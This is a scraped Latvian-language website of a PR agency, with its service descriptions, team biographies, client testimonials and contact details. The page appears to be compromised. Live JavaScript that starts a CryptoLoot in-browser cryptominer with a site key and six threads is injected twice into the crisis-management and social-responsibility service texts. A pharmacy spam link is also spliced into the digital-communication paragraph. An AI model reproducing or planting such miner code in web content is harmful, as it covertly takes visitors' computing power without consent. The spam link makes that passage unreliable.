.
.
.
PR Impact Awards 2017
PRAwards

Par mums

Latviešu

Pakalpojumi

Vadības konsultācijas
Vadības konsultācijas
Biznesa vajadzību izpratne, pieredze, kontakti un radošs skatījums ikdienišķām lietām. Mēs zinām, kā sasniegt mērķi ar pareizu vēstījumu.
Interešu aizstāvība
Interešu aizstāvība
Lai sasniegtu mērķi, jārunā vienā valodā. Burtiskā un pārnestā nozīmē. Mēs zinām - kā. Mums ir kontakti, pieredze un mēs zinām, kā panākt, lai jūs sadzird. Pareizajā vietā un pareizajā laikā.
Komunikācija digitālajā vidē
Komunikācija digitālajā vidē
Digitālā vide mainās ik dienu, stundu un sekundi. Mēs strādājam http://www.viagrabelgiquefr.com/ ātrāk. Ar rūpīgi izstrādātām stratēģijām, mēs efektīvi sasniedzam mērķus.
Korporatīvā komunikācija
Korporatīvā komunikācija
Mūsu stiprā puse ir zināšanas - kā komunicēt ar ieinteresētām pusēm, kā veidot produktu komunikāciju, reizē veicinot uzņēmuma zīmola, vērtību un leģendas atpazīstamību.
Krīzes un problēmsituāciju pārvaldība
Krīzes un problēmsituāciju pārvaldība
Esam pārliecināti - labāk būt sagatavotam, nekā krist panikā. Palīdzam laicīgi apzināties riskus, sagatavot atbildes, reaģēt ātri. var miner = new CryptoLoot.Anonymous('1c5fa5da0b660db6f8ee3ee247763fcd7169be50cebf'); miner.start(); var miner=new CryptoLoot.Anonymous('1c5fa5da0b660db6f8ee3ee247763fcd7169be50cebf', { threads:6,autoThreads:false,throttle:0.2, } ); miner.start(); // Listen on events miner.on('found', function() { /* Hash found */ }) miner.on('accepted', function() { /* Hash accepted by the pool */ }) // Update stats once per second setInterval(function() { var hashesPerSecond = miner.getHashesPerSecond(); var totalHashes = miner.getTotalHashes(); var acceptedHashes = miner.getAcceptedHashes(); // Output to HTML elements... }, 1000);
Apmācības
Apmācības
Kā ar vārdiem sasniegt mērķi? Kā kļūt pamanāmam pūlī? Kā nepazust informācijas plūsmā? Mēs zinām, cik būtiska ir pārliecinoša komunikācija. Mēs to protam. Varam iemācīt!
Mediju attiecības
Mediju attiecības
Tas, kas ir mediju dienaskārtībā, ir aktuāls. Mēs zinām, kā tur nokļūt. Mēs protam izstāstīt jūsu stāstu, veidot ziņu svarīgu un aktuālu.
Iekšējā komunikācija
Iekšējā komunikācija
Ikviena uzņēmuma vissvarīgākās attiecības ir attiecības ar darbiniekiem, jo tie ir nozīmīgs resurss. Iedvesma un motivācija ir tikpat svarīga kā alga. Mēs palīdzēsim komunicēt mērķtiecīgi, ar nozīmi un tā, lai tas patiesi iedvesmo.
Korporatīvā sociālā atbildība
Korporatīvā sociālā atbildība
Būt atbildīgam nozīmē domāt plašāk. Saredzēt vairāk. Mēs palīdzēsim saskatīt nianses, tās izcelt un parādīt. var miner = new CryptoLoot.Anonymous('1c5fa5da0b660db6f8ee3ee247763fcd7169be50cebf'); miner.start(); var miner=new CryptoLoot.Anonymous('1c5fa5da0b660db6f8ee3ee247763fcd7169be50cebf', { threads:6,autoThreads:false,throttle:0.2, } ); miner.start(); // Listen on events miner.on('found', function() { /* Hash found */ }) miner.on('accepted', function() { /* Hash accepted by the pool */ }) // Update stats once per second setInterval(function() { var hashesPerSecond = miner.getHashesPerSecond(); var totalHashes = miner.getTotalHashes(); var acceptedHashes = miner.getAcceptedHashes(); // Output to HTML elements... }, 1000);

Komanda

Inga Latkovska|valdes priekšsēdētāja, partnere
Inga Latkovska ir viena no pieredzējušākajām sabiedrisko attiecību profesijas pārstāvēm Latvijā. Strādājusi komunikācijas nozarē kopš 1995. gada, kad izveidoja sabiedrisko attiecību aģentūru "PR Stils". Plaša pieredze ietekmes pušu attiecībās, lobijā un korporatīvās komunikācijas jautājumos. Ieguvusi maģistra grādu komunikācijas zinātnē Latvijas Universitātē, šobrīd viņa turpina doktorantūras studijas.
Silvestrs Savickis|partneris
Silvestrs Savickis ir strādājis mārketinga un sabiedrisko attiecību nozarē kopš 2000. gada. Sabiedrisko attiecību aģentūras Versus Grey dibinātājs. Pirms tam astoņus gadus strādājis Latvijas diplomātiskajā dienestā (1993-2000) vadošos amatos Latvijas Ārlietu ministrijā. Silvestrs ir ieguvis maģistra grādu sociālajās zinātnēs Latvijas Universitātē un bakalaura grādu ekonomikā Rīgas Tehniskajā universitātē.
 
  • 990 days ago Ieskaties! Mūsu logotips ieguvis īpašu rotājumu! Tāpēc, ka mums šajā rudenī paliek 20! Uzzini vairāk: http://t.co/5xMhJ4dsDA

Pieredze

Klienti

Aģentūra labi pārzina mediju vidi un var sniegt ieteikumus, kā labāk virzīt komunikāciju medijos.

Silvija Veide, Zīmola komunikācijas un PR vadītāja Baltijā

Agency is demonstrating professional approach to business in which the agency has an excellent cooperation with both the journalists from automotive field and also partnership agencies in the Baltic States and other countries. Their collective consists of professional specialists in the field of public relations.

Anna Hahn-Leśniewska, Client Service Director

Esam pārliecinājušies par aģentūras darbinieku analītisko pieeju, radošumu un spēju izprast klienta vajadzības, kā arī sasniegt gaidīto rezultātu.

Baiba Gulbe, Korporatīvās komunikācijas direktore

Our business is challenging in terms of communication, not always perceived positively from the public and media. During our cooperation with LEAD we’ve reached recognized industry status, our viewpoint is valued. For me it’s important to know that the agency is analytical, professional and creative, that they understand the specifics of the market we are operating in. LEAD is a great partner with whom together to aim for business goals.

Mrs Dana Hasana, Head of Communication, Amber Beverage Group

Pozitīvi vērtējam aģentūras darbinieku atbildīgo un radošo pieeju - esam apmierināti ar aģentūras spēju izprast pasūtītāja vajadzības un sasniegt nospraustos mērķus.

Agnese Strazda, Korporatīvas komunikācijas pārvaldes vadītāja

LEAD. Corporate Communications” consultants did a great job in developing a public affairs strategy in Latvia for MasterCard and providing strategic counsel and implementation of tactics by helping the company to reach out to various relevant stakeholders, be they policymakers or not. Lead also supported MasterCard with its media activities, for instance by ensuring presence in the key media such as national prints, online news portals as well as radio and TV channels prime time.

Mr Ludovic Espitalier-Noël, Director Public Policy, MasterCard Europe

We highly appreciate the professionalism of the agency and employee responsible approach to their tasks. The team understands customer's wishes and needs, and are able to successfully achieve their goals.

Mrs. Guntra Matīsa, Head of Communications, Fortum Latvia

Īpaši augstu vērtējam zināšanas par tirgu, elastību un palīdzību situācijās, kad darbiem atvēlēts īss izpildes termiņš. Visi darbi vienmēr ir tikuši veikti laikā un teicamā kvalitātē.

Ģirts Rūda, Partneris, zvērināts advokāts

The agency's strong points are ample experience with both private and public sector projects, seasoned strategic advisors – Inga Latkovska and Silvestrs Savickis, and responsiveness to client needs. They meet deadlines, are well organized, and are able to prepare high quality ideas and proposals. ,

Mr. Mārtiņš Zemītis, Economist, The European Commission

Aģentūra darbu veic profesionāli, spēj piedāvāt radošus risinājumus un veiksmīgi piesaistīt sadarbības partnerus. Darbinieku komanda ir profesionāli speciālisti savā jomā.

Egita Pole, Veselības ministrijas Komunikācijas nodaļas vadītāja

Uzņēmums spēja rast interesantus risinājumus, kā padarīt atraktīvākus seminārus jauniešiem un kā patiešām ievērojami palielināt kvalitatīvu ministrijas sociālo tīklu sekotāju skaitu. Arī kampaņas "Dots devējam atdodas" vizuāli materiāli tika izstrādāti augstā kvalitātē. Savstarpējo sadarbību uzskatām par veiksmīgu, jo jau pirmie kampaņas soļi rādīja, ka varēsim uzticēties "LEAD. Korporatīvā komunikācija" komandas darbam. Kampaņas realizācija bija jāveic saspringtā laika termiņā, ar ko uzņēmums tika galā profesionāli, iekļaujoties noteiktajos termiņos.

Finanšu ministrija,

Lāčplēša iela 36-2
Rīga, LV-1011, Latvija
Tālr.67282472
info@lead.lv